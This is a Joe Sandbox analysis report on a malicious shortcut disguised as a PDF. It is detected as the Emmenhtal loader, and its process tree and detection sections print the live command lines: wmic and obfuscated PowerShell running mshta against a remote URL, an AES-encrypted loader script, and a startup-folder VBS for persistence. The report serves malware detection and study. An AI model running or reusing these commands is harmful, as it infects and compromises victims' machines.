Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HateSpeech2024_Summary.pdf.lnk.bin.lnk

Overview

General Information

Sample name:HateSpeech2024_Summary.pdf.lnk.bin.lnk
Analysis ID:1584384
MD5:97d7ccb68cdc1beaee32700a58e8f901
SHA1:c16d12acb3de008be42cd1d5527ee5ecd51d6354
SHA256:9315c00b9914f987381604b289e426dab0e6c8eefd7ccb0656c2cde5503800c7
Tags:lnkuser-zhuzhu0009
Infos:

Detection

Emmenhtal Loader, MalLnk
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Emmenhtal Loader
Yara detected malicious lnk
AI detected suspicious sample
Contains functionality to create processes via WMI
Creates processes via WMI
Drops VBS files to the startup folder
Found PHP interpreter
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • WMIC.exe (PID: 7560 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7628 cmdline: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://myfilebuilders.com/samm" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 7872 cmdline: "C:\Windows\system32\mshta.exe" https://myfilebuilders.com/samm MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 8032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'CC0D32DBB8F2AEAAAD367283309458E20D13E54AE9F93C26DBBAD73293BD50A36D9574E1A9FCCBBE98A49FC7AA50C3C051F3CBAE9B99771F9B3471A8B7406647B45710656B9560F816F99C52E5CD056E94BB343C78DECD912750ECF5C120A3C6120F92F9AB407C779692B2B801886D4C1933853B818B2F4ACBF254531544A97C461534F8989BDBE763C47BD13A5027B3175BDB8C0BA73400B08CB34FF3383856710CB6019243D1C36B39D01C9442DBEB89528D749444614EA6F3A125CFDB0B5CB39EA903AD087683829FAE488C94736BC882DFA6F1B5BADE602DC13EA4A71F59C0C555E4AA6CC495A964CEE240BAC2F3D429AA98692B0BF989429E291DCF520A3167A6D7D554A48ED1EC98E1F71AA758670750C98404FB140B70E6F8CE88015D69E8D0F3FCF7F737F074F810905C0DD5FD37726F325B89CC02C3B0CD71DD28A101A9080999F615A7AF33942A1FEAF9033FFB3CB02D88C83CEA4BEB13D36CCCDE536D2D4EA38EA00E492838E3E78EE9C0CA9DBC405A5C6F049999533FD9F5FA7404801734E8378978546AAF5D84956D74F1C451D373B86F3488593922F15AEE13BA02471A9C112CEDF4833B3F0638A4A8CECD1D52E9714EA9EDEB5E32944EB33FE52FB8A4B556B1DA6183E48183ACE760AE01310141F680BF3D33446801FC2BFD3000C1BDD51A6E8F30AA8A9B5C8BFBB555A5C04AC12A81509772CE127CB8598C525EBA2A091166AA250CCC96785ABD72973ECED6924E22C09BD25C868452073029B96D7C754E3D74FDF15E08C2A0F4C53F93F39EC3F0FD965A188FDF13D042BBC47CF96138A70FAB9162E32734D3C137CC3A4D27DB5363F9FA5F59ECAC5ADF283B806C00431D7D240795F83F85010F571088B246CEEDC36DADA39641C871CCD8E775017B5A338D1D94E045C140E05F8F86DB296BFFD092C327B31BB3D19F8C1B5B5EFBFD54647ABB292A0F16D86139B074238F1AB2638E0A3034AC7C00056A6E988B63A360B70DCBCDFD1A98A7DE9D02F1760C98DEFEFD55748A81631DD8336CCBC8BDB9784FDC8ED2398FADF660B1349E919FD6497D31A84903C8649BB847B3734E51D3C9ABDFA5BBE03A6CA0E3EC6A9ABB6054F6EB3DE0B804173A9DFDFD85C03FBB3DD4CD7152D30D13AF80E4BC2D9D561DB494C445384AF14A71AF67A3F252F2BAB0EB8A399A9F3DE478EE0920E4F717E63A195E6394FFD001BEFEED37566A40C55DC5CF48EF42822AD3876834FF7F2C41AA52134D41CE152176D5FBC298F91AF4E5C2ADB1486720693646536D8308BF068787AEE0EED268732FA76B22C73A43EEC2E677B595D575F1EDD71FAEC18238660E9D88409FA932407116BB516B6340B888E6FF5C5E303826F793F4E87135C2D9D20886EB5FCFC42C0D9603B67C13BBE82488090447CE2D406BCE4F71F8DED1277FB46A3F2E9FEB147880DEF6AD74481A95C5A94D480FA6742D967332B49570E903748A0BC475D54F8A4C548412C4AE30767A66A97B5BCFEE2DCB02BD3B11FA82EA1D214EA6520580B2DDF1FACDAD83B1921E52658D688B42F0DC0F163134922A308D66702D2E0ABFC978ECCE276FD6423CFF201D4169303D1FEE518BF422FDA896E2625653444DDB524D1779473C3EF10919F817A39FEBE05CE776ACD3EEB5F6529FC14DA7797DC617900100111D543A4680515798A7EB47B4C3C8F79DA82C90F0A61ADCC29B3FFCB05F9F13ECC10A907A9F8FD908476EA00AAE8E8631736D715947485271496F5853536B744B';function wLh ($iUUDD){return -split ($iUUDD -replace '..', '0x$& ')};$feiFxp = wLh($ddg.SubString(0, 2464));$zXe = [System.Security.Cryptography.Aes]::Create();$zXe.Key = wLh($ddg.SubString(2464));$zXe.IV = New-Object byte[] 16;$QlaSHZgH = $zXe.CreateDecryptor();$PwiNROQ = [System.String]::new($QlaSHZgH.TransformFinalBlock($feiFxp, 0,$feiFxp.Length)); sal fd $PwiNROQ.Substring(3,3); fd $PwiNROQ.Substring(6) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Acrobat.exe (PID: 7292 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Professional_Social_Media_Report.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
              • AcroCEF.exe (PID: 2924 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                • AcroCEF.exe (PID: 7640 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,17340846460468953801,1805849140092646528,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • php_bot_downloader_v2-AVERAGE-BOI-CLN.exe (PID: 7828 cmdline: "C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe" MD5: F63E0C410E4CA83CDA47BA4871AEAC30)
              • cmd.exe (PID: 9080 cmdline: "C:\Windows\System32\cmd.exe" /C tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 9088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • tar.exe (PID: 9124 cmdline: tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming" MD5: 3596DC15B6F6CBBB6EC8B143CBD57F24)
              • cmd.exe (PID: 9160 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 9168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • php.exe (PID: 9208 cmdline: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php MD5: FA544CF95C1B82AFC25B9C5C55C5AD73)
  • svchost.exe (PID: 7964 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 8340 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 2672 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • php.exe (PID: 8264 cmdline: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php MD5: FA544CF95C1B82AFC25B9C5C55C5AD73)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
HateSpeech2024_Summary.pdf.lnk.bin.lnkJoeSecurity_MalLnkYara detected malicious lnkJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1]JoeSecurity_EmmenhtalLoaderYara detected Emmenhtal LoaderJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1]emmenhtal_strings_hta_exeEmmenhtal Loader stringSekoia.io
      • 0xccdd7:$char: = String.fromCharCode(Yb,Zy,
      • 0xccdd0:$var: var
      • 0x11a00e:$eval: eval(
      • 0xccc4f:$script1: <script>
      • 0x11a004:$script1: <script>
      • 0xd5bfb:$script2: </script>MZ
      • 0x11a02a:$script2: </script>MZ

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: mshta.exe PID: 7872JoeSecurity_EmmenhtalLoaderYara detected Emmenhtal LoaderJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Potentially Suspicious PowerShell Child Processes
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://myfilebuilders.com/samm, CommandLine: "C:\Windows\system32\mshta.exe" https://myfilebuilders.com/samm, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://myfilebuilders.com/samm", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7788, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://myfilebuilders.com/samm, ProcessId: 7872, ProcessName: mshta.exe
        Sigma detected: Suspicious MSHTA Child Process
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'CC0D32DBB8F2AEAAAD367283309458E20D13E54AE9F93C26DBBAD73293BD50A36D9574E1A9FCCBBE98A49FC7AA50C3C051F3CBAE9B99771F9B3471A8B7406647B45710656B9560F816F99C52E5CD056E94BB343C78DECD912750ECF5C120A3C6120F92F9AB407C779692B2B801886D4C1933853B818B2F4ACBF254531544A97C461534F8989BDBE763C47BD13A5027B3175BDB8C0BA73400B08CB34FF3383856710CB6019243D1C36B39D01C9442DBEB89528D749444614EA6F3A125CFDB0B5CB39EA903AD087683829FAE488C94736BC882DFA6F1B5BADE602DC13EA4A71F59C0C555E4AA6CC495A964CEE240BAC2F3D429AA98692B0BF989429E291DCF520A3167A6D7D554A48ED1EC98E1F71AA758670750C98404FB140B70E6F8CE88015D69E8D0F3FCF7F737F074F810905C0DD5FD37726F325B89CC02C3B0CD71DD28A101A9080999F615A7AF33942A1FEAF9033FFB3CB02D88C83CEA4BEB13D36CCCDE536D2D4EA38EA00E492838E3E78EE9C0CA9DBC405A5C6F049999533FD9F5FA7404801734E8378978546AAF5D84956D74F1C451D373B86F3488593922F15AEE13BA02471A9C112CEDF4833B3F0638A4A8CECD1D52E9714EA9EDEB5E32944EB33FE52FB8A4B556B1DA6183E48183ACE760AE01310141F680BF3D33446801FC2BFD3000C1BDD51A6E8F30AA8A9B5C8BFBB555A5C04AC12A81509772CE127CB8598C525EBA2A091166AA250CCC96785ABD72973ECED6924E22C09BD25C868452073029B96D7C754E3D74FDF15E08C2A0F4C53F93F39EC3F0FD965A188FDF13D042BBC47CF96138A70FAB9162E32734D3C137CC3A4D27DB5363F9FA5F59ECAC5ADF283B806C00431D7D240795F83F85010F571088B246CEEDC36DADA39641C871CCD8E775017B5A338D1D94E045C140E05F8F86DB296BFFD092C327B31BB3D19F8C1B5B5EFBFD54647ABB292A0F16D86139B074238F1AB2638E0A3034AC7C00056A6E988B63A360B70DCBCDFD1A98A7DE9D02F1760C98DEFEFD55748A81631DD8336CCBC8BDB9784FDC8ED2398FADF660B1349E919FD6497D31A84903C8649BB847B3734E51D3C9ABDFA5BBE03A6CA0E3EC6A9ABB6054F6EB3DE0B804173A9DFDFD85C03FBB3DD4CD7152D30D13AF80E4BC2D9D561DB494C445384AF14A71AF67A3F252F2BAB0EB8A399A9F3DE478EE0920E4F717E63A195E6394FFD001BEFEED37566A40C55DC5CF48EF42822AD3876834FF7F2C41AA52134D41CE152176D5FBC298F91AF4E5C2ADB1486720693646536D8308BF068787AEE0EED268732FA76B22C73A43EEC2E677B595D575F1EDD71FAEC18238660E9D88409FA932407116BB516B6340B888E6FF5C5E303826F793F4E87135C2D9D20886EB5FCFC42C0D9603B67C13BBE82488090447CE2D406BCE4F71F8DED1277FB46A3F2E9FEB147880DEF6AD74481A95C5A94D480FA6742D967332B49570E903748A0BC475D54F8A4C548412C4AE30767A66A97B5BCFEE2DCB02BD3B11FA82EA1D214EA6520580B2DDF1FACDAD83B1921E52658D688B42F0DC0F163134922A308D66702D2E0ABFC978ECCE276FD6423CFF201D4169303D1FEE518BF422FDA896E2625653444DDB524D1779473C3EF10919F817A39FEBE05CE776ACD3EEB5F6529FC14DA7797DC617900100111D543A4680515798A7EB47B4C3C8F79DA82C90F0A61ADCC29B3FFCB05F9F13ECC10A907A9F8FD908476EA00AAE8E8631736D715947485271496F5853536B744B';function wLh ($iUUDD){return -split ($iUUDD -replace '..', '0x$& ')};$feiFxp = wLh($ddg.SubString(0, 2464));$zXe = [System.Security.Cryptography.Aes]::Create();$zXe.Key = wLh($ddg.SubString(2464));$zXe.IV = New-Object byte[] 16;$QlaSHZgH = $zXe.CreateDecryptor();$PwiNROQ = [System.String]::new($QlaSHZgH.TransformFinalBlock($feiFxp, 0,$feiFxp.Length)); sal fd $PwiNROQ.Substring(3,3); fd $Pw
        Sigma detected: Suspicious Process Created Via Wmic.EXE
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')", ProcessId: 7560, ProcessName: WMIC.exe
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs" , ProcessId: 8340, ProcessName: wscript.exe
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'CC0D32DBB8F2AEAAAD367283309458E20D13E54AE9F93C26DBBAD73293BD50A36D9574E1A9FCCBBE98A49FC7AA50C3C051F3CBAE9B99771F9B3471A8B7406647B45710656B9560F816F99C52E5CD056E94BB343C78DECD912750ECF5C120A3C6120F92F9AB407C779692B2B801886D4C1933853B818B2F4ACBF254531544A97C461534F8989BDBE763C47BD13A5027B3175BDB8C0BA73400B08CB34FF3383856710CB6019243D1C36B39D01C9442DBEB89528D749444614EA6F3A125CFDB0B5CB39EA903AD087683829FAE488C94736BC882DFA6F1B5BADE602DC13EA4A71F59C0C555E4AA6CC495A964CEE240BAC2F3D429AA98692B0BF989429E291DCF520A3167A6D7D554A48ED1EC98E1F71AA758670750C98404FB140B70E6F8CE88015D69E8D0F3FCF7F737F074F810905C0DD5FD37726F325B89CC02C3B0CD71DD28A101A9080999F615A7AF33942A1FEAF9033FFB3CB02D88C83CEA4BEB13D36CCCDE536D2D4EA38EA00E492838E3E78EE9C0CA9DBC405A5C6F049999533FD9F5FA7404801734E8378978546AAF5D84956D74F1C451D373B86F3488593922F15AEE13BA02471A9C112CEDF4833B3F0638A4A8CECD1D52E9714EA9EDEB5E32944EB33FE52FB8A4B556B1DA6183E48183ACE760AE01310141F680BF3D33446801FC2BFD3000C1BDD51A6E8F30AA8A9B5C8BFBB555A5C04AC12A81509772CE127CB8598C525EBA2A091166AA250CCC96785ABD72973ECED6924E22C09BD25C868452073029B96D7C754E3D74FDF15E08C2A0F4C53F93F39EC3F0FD965A188FDF13D042BBC47CF96138A70FAB9162E32734D3C137CC3A4D27DB5363F9FA5F59ECAC5ADF283B806C00431D7D240795F83F85010F571088B246CEEDC36DADA39641C871CCD8E775017B5A338D1D94E045C140E05F8F86DB296BFFD092C327B31BB3D19F8C1B5B5EFBFD54647ABB292A0F16D86139B074238F1AB2638E0A3034AC7C00056A6E988B63A360B70DCBCDFD1A98A7DE9D02F1760C98DEFEFD55748A81631DD8336CCBC8BDB9784FDC8ED2398FADF660B1349E919FD6497D31A84903C8649BB847B3734E51D3C9ABDFA5BBE03A6CA0E3EC6A9ABB6054F6EB3DE0B804173A9DFDFD85C03FBB3DD4CD7152D30D13AF80E4BC2D9D561DB494C445384AF14A71AF67A3F252F2BAB0EB8A399A9F3DE478EE0920E4F717E63A195E6394FFD001BEFEED37566A40C55DC5CF48EF42822AD3876834FF7F2C41AA52134D41CE152176D5FBC298F91AF4E5C2ADB1486720693646536D8308BF068787AEE0EED268732FA76B22C73A43EEC2E677B595D575F1EDD71FAEC18238660E9D88409FA932407116BB516B6340B888E6FF5C5E303826F793F4E87135C2D9D20886EB5FCFC42C0D9603B67C13BBE82488090447CE2D406BCE4F71F8DED1277FB46A3F2E9FEB147880DEF6AD74481A95C5A94D480FA6742D967332B49570E903748A0BC475D54F8A4C548412C4AE30767A66A97B5BCFEE2DCB02BD3B11FA82EA1D214EA6520580B2DDF1FACDAD83B1921E52658D688B42F0DC0F163134922A308D66702D2E0ABFC978ECCE276FD6423CFF201D4169303D1FEE518BF422FDA896E2625653444DDB524D1779473C3EF10919F817A39FEBE05CE776ACD3EEB5F6529FC14DA7797DC617900100111D543A4680515798A7EB47B4C3C8F79DA82C90F0A61ADCC29B3FFCB05F9F13ECC10A907A9F8FD908476EA00AAE8E8631736D715947485271496F5853536B744B';function wLh ($iUUDD){return -split ($iUUDD -replace '..', '0x$& ')};$feiFxp = wLh($ddg.SubString(0, 2464));$zXe = [System.Security.Cryptography.Aes]::Create();$zXe.Key = wLh($ddg.SubString(2464));$zXe.IV = New-Object byte[] 16;$QlaSHZgH = $zXe.CreateDecryptor();$PwiNROQ = [System.String]::new($QlaSHZgH.TransformFinalBlock($feiFxp, 0,$feiFxp.Length)); sal fd $PwiNROQ.Substring(3,3); fd $Pw
        Sigma detected: Potential Binary Or Script Dropper Via PowerShell
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8032, TargetFilename: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs" , ProcessId: 8340, ProcessName: wscript.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm'), CommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 7560, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm'), ProcessId: 7628, ProcessName: powershell.exe
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7964, ProcessName: svchost.exe

        Data Obfuscation

        barindex
        Sigma detected: Drops script at startup location
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe, ProcessId: 9208, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: HateSpeech2024_Summary.pdf.lnk.bin.lnkReversingLabs: Detection: 23%
        Source: HateSpeech2024_Summary.pdf.lnk.bin.lnkVirustotal: Detection: 27%Perma Link
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\license.txt
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\readme-redist-bins.txt
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php8ts.pdb source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp
        Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000005.00000003.1677761143.000001EB131FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840765627.000001EB1396A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840765627.000001EB139C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1839341806.000001EB13A67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840318424.000001EB1395B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842211450.000001EB13116000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1679419864.000001EB131FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843243271.000001EB13118000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841460930.000001EB0EFB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840586133.000001EB13968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841125562.000001EB1315A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842473193.000001EB138C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841348809.000001EB13071000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1839954374.000001EB15CC1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840963450.000001EB139FA000.00000004.00000020.00020000.00000000.sdmp, 